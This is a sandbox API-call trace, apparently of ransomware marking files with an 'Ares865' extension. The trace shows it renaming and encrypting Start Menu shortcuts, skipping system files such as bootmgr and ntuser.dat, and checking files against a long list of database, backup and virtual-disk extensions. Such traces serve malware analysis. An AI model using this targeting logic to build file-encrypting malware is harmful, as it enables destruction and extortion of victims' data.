dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.875] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.875] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0066.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0066.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0066.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0066.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.876] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0066.876] CloseHandle (hObject=0x12c) returned 1 [0066.876] CloseHandle (hObject=0x164) returned 1 [0066.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.877] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb7f760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bb7f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0066.877] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0066.877] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb7f760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bb7f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0066.877] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0066.877] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2628 [0066.877] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk.Ares865") returned 97 [0066.878] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.879] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\sharepoint\\microsoft sharepoint workspace 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.879] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3055) returned 1 [0066.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.879] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.880] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.880] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.880] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xef0, lpName=0x0) returned 0x120 [0066.882] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xef0) returned 0x420000 [0066.883] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.884] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.884] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0066.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0066.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0066.884] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0066.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.885] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.885] CloseHandle (hObject=0x120) returned 1 [0066.885] CloseHandle (hObject=0x12c) returned 1 [0066.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.885] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.887] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78038410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x78038410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78038410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xbef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft SharePoint Workspace 2010.lnk", cAlternateFileName="MICROS~1.LNK")) returned 0 [0066.887] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0066.887] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2608 [0066.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk.Ares865") returned 89 [0066.888] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.889] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.889] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2919) returned 1 [0066.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.890] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.890] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.890] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.891] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe70, lpName=0x0) returned 0x120 [0066.892] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe70) returned 0x420000 [0066.893] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.894] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.894] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.894] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0066.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0066.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.895] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.895] CloseHandle (hObject=0x120) returned 1 [0066.895] CloseHandle (hObject=0x12c) returned 1 [0066.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0066.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.895] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.895] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78038410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x78038410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78038410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xb87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Excel 2010.lnk", cAlternateFileName="MICROS~2.LNK")) returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="aoldtz.exe") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2=".") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="..") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="windows") returned -1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="bootmgr") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="temp") returned -1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="pagefile.sys") returned -1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="boot") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="ids.txt") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="ntuser.dat") returned -1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="perflogs") returned -1 [0066.895] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2="MSBuild") returned -1 [0066.895] lstrlenW (lpString="Microsoft Excel 2010.lnk") returned 24 [0066.895] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk") returned 81 [0066.896] lstrcpyW (in: lpString1=0x2cce470, lpString2="Microsoft Excel 2010.lnk" | out: lpString1="Microsoft Excel 2010.lnk") returned="Microsoft Excel 2010.lnk" [0066.896] lstrlenW (lpString="Microsoft Excel 2010.lnk") returned 24 [0066.896] lstrlenW (lpString="Ares865") returned 7 [0066.896] lstrcmpiW (lpString1="010.lnk", lpString2="Ares865") returned -1 [0066.896] lstrlenW (lpString=".dll") returned 4 [0066.896] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2=".dll") returned 1 [0066.896] lstrlenW (lpString=".lnk") returned 4 [0066.896] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2=".lnk") returned 1 [0066.896] lstrlenW (lpString=".ini") returned 4 [0066.896] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2=".ini") returned 1 [0066.896] lstrlenW (lpString=".sys") returned 4 [0066.896] lstrcmpiW (lpString1="Microsoft Excel 2010.lnk", lpString2=".sys") returned 1 [0066.896] lstrlenW (lpString="Microsoft Excel 2010.lnk") returned 24 [0066.896] lstrlenW (lpString="bak") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0066.896] lstrlenW (lpString="ba_") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0066.896] lstrlenW (lpString="dbb") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0066.896] lstrlenW (lpString="vmdk") returned 4 [0066.896] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0066.896] lstrlenW (lpString="rar") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0066.896] lstrlenW (lpString="zip") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0066.896] lstrlenW (lpString="tgz") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0066.896] lstrlenW (lpString="vbox") returned 4 [0066.896] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0066.896] lstrlenW (lpString="vdi") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0066.896] lstrlenW (lpString="vhd") returned 3 [0066.896] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0066.896] lstrlenW (lpString="vhdx") returned 4 [0066.896] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0066.897] lstrlenW (lpString="avhd") returned 4 [0066.897] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0066.897] lstrlenW (lpString="db") returned 2 [0066.897] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0066.897] lstrlenW (lpString="db2") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0066.897] lstrlenW (lpString="db3") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0066.897] lstrlenW (lpString="dbf") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0066.897] lstrlenW (lpString="mdf") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0066.897] lstrlenW (lpString="mdb") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0066.897] lstrlenW (lpString="sql") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0066.897] lstrlenW (lpString="sqlite") returned 6 [0066.897] lstrcmpiW (lpString1="10.lnk", lpString2="sqlite") returned -1 [0066.897] lstrlenW (lpString="sqlite3") returned 7 [0066.897] lstrcmpiW (lpString1="010.lnk", lpString2="sqlite3") returned -1 [0066.897] lstrlenW (lpString="sqlitedb") returned 8 [0066.897] lstrcmpiW (lpString1="2010.lnk", lpString2="sqlitedb") returned -1 [0066.897] lstrlenW (lpString="xml") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0066.897] lstrlenW (lpString="$er") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0066.897] lstrlenW (lpString="4dd") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0066.897] lstrlenW (lpString="4dl") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0066.897] lstrlenW (lpString="^^^") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0066.897] lstrlenW (lpString="abs") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0066.897] lstrlenW (lpString="abx") returned 3 [0066.897] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0066.897] lstrlenW (lpString="accdb") returned 5 [0066.898] lstrcmpiW (lpString1="0.lnk", lpString2="accdb") returned -1 [0066.898] lstrlenW (lpString="accdc") returned 5 [0066.898] lstrcmpiW (lpString1="0.lnk", lpString2="accdc") returned -1 [0066.898] lstrlenW (lpString="accde") returned 5 [0066.898] lstrcmpiW (lpString1="0.lnk", lpString2="accde") returned -1 [0066.898] lstrlenW (lpString="accdr") returned 5 [0066.898] lstrcmpiW (lpString1="0.lnk", lpString2="accdr") returned -1 [0066.898] lstrlenW (lpString="accdt") returned 5 [0066.898] lstrcmpiW (lpString1="0.lnk", lpString2="accdt") returned -1 [0066.898] lstrlenW (lpString="accdw") returned 5 [0066.898] lstrcmpiW (lpString1="0.lnk", lpString2="accdw") returned -1 [0066.898] lstrlenW (lpString="accft") returned 5 [0066.898] lstrcmpiW (lpString1="0.lnk", lpString2="accft") returned -1 [0066.898] lstrlenW (lpString="adb") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.898] lstrlenW (lpString="adb") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.898] lstrlenW (lpString="ade") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0066.898] lstrlenW (lpString="adf") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0066.898] lstrlenW (lpString="adn") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0066.898] lstrlenW (lpString="adp") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0066.898] lstrlenW (lpString="alf") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0066.898] lstrlenW (lpString="ask") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0066.898] lstrlenW (lpString="btr") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0066.898] lstrlenW (lpString="cat") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0066.898] lstrlenW (lpString="cdb") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0066.898] lstrlenW (lpString="ckp") returned 3 [0066.898] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0066.898] lstrlenW (lpString="cma") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0066.899] lstrlenW (lpString="cpd") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0066.899] lstrlenW (lpString="dacpac") returned 6 [0066.899] lstrcmpiW (lpString1="10.lnk", lpString2="dacpac") returned -1 [0066.899] lstrlenW (lpString="dad") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0066.899] lstrlenW (lpString="dadiagrams") returned 10 [0066.899] lstrcmpiW (lpString1="l 2010.lnk", lpString2="dadiagrams") returned 1 [0066.899] lstrlenW (lpString="daschema") returned 8 [0066.899] lstrcmpiW (lpString1="2010.lnk", lpString2="daschema") returned -1 [0066.899] lstrlenW (lpString="db-journal") returned 10 [0066.899] lstrcmpiW (lpString1="l 2010.lnk", lpString2="db-journal") returned 1 [0066.899] lstrlenW (lpString="db-shm") returned 6 [0066.899] lstrcmpiW (lpString1="10.lnk", lpString2="db-shm") returned -1 [0066.899] lstrlenW (lpString="db-wal") returned 6 [0066.899] lstrcmpiW (lpString1="10.lnk", lpString2="db-wal") returned -1 [0066.899] lstrlenW (lpString="dbc") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0066.899] lstrlenW (lpString="dbs") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0066.899] lstrlenW (lpString="dbt") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0066.899] lstrlenW (lpString="dbv") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0066.899] lstrlenW (lpString="dbx") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0066.899] lstrlenW (lpString="dcb") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0066.899] lstrlenW (lpString="dct") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0066.899] lstrlenW (lpString="dcx") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0066.899] lstrlenW (lpString="ddl") returned 3 [0066.899] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0066.899] lstrlenW (lpString="dlis") returned 4 [0066.899] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0066.899] lstrlenW (lpString="dp1") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0066.900] lstrlenW (lpString="dqy") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0066.900] lstrlenW (lpString="dsk") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0066.900] lstrlenW (lpString="dsn") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0066.900] lstrlenW (lpString="dtsx") returned 4 [0066.900] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0066.900] lstrlenW (lpString="dxl") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0066.900] lstrlenW (lpString="eco") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0066.900] lstrlenW (lpString="ecx") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0066.900] lstrlenW (lpString="edb") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0066.900] lstrlenW (lpString="epim") returned 4 [0066.900] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0066.900] lstrlenW (lpString="fcd") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0066.900] lstrlenW (lpString="fdb") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0066.900] lstrlenW (lpString="fic") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0066.900] lstrlenW (lpString="flexolibrary") returned 12 [0066.900] lstrcmpiW (lpString1="cel 2010.lnk", lpString2="flexolibrary") returned -1 [0066.900] lstrlenW (lpString="fm5") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0066.900] lstrlenW (lpString="fmp") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0066.900] lstrlenW (lpString="fmp12") returned 5 [0066.900] lstrcmpiW (lpString1="0.lnk", lpString2="fmp12") returned -1 [0066.900] lstrlenW (lpString="fmpsl") returned 5 [0066.900] lstrcmpiW (lpString1="0.lnk", lpString2="fmpsl") returned -1 [0066.900] lstrlenW (lpString="fol") returned 3 [0066.900] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0066.901] lstrlenW (lpString="fp3") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0066.901] lstrlenW (lpString="fp4") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0066.901] lstrlenW (lpString="fp5") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0066.901] lstrlenW (lpString="fp7") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0066.901] lstrlenW (lpString="fpt") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0066.901] lstrlenW (lpString="frm") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0066.901] lstrlenW (lpString="gdb") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0066.901] lstrlenW (lpString="gdb") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0066.901] lstrlenW (lpString="grdb") returned 4 [0066.901] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0066.901] lstrlenW (lpString="gwi") returned 3 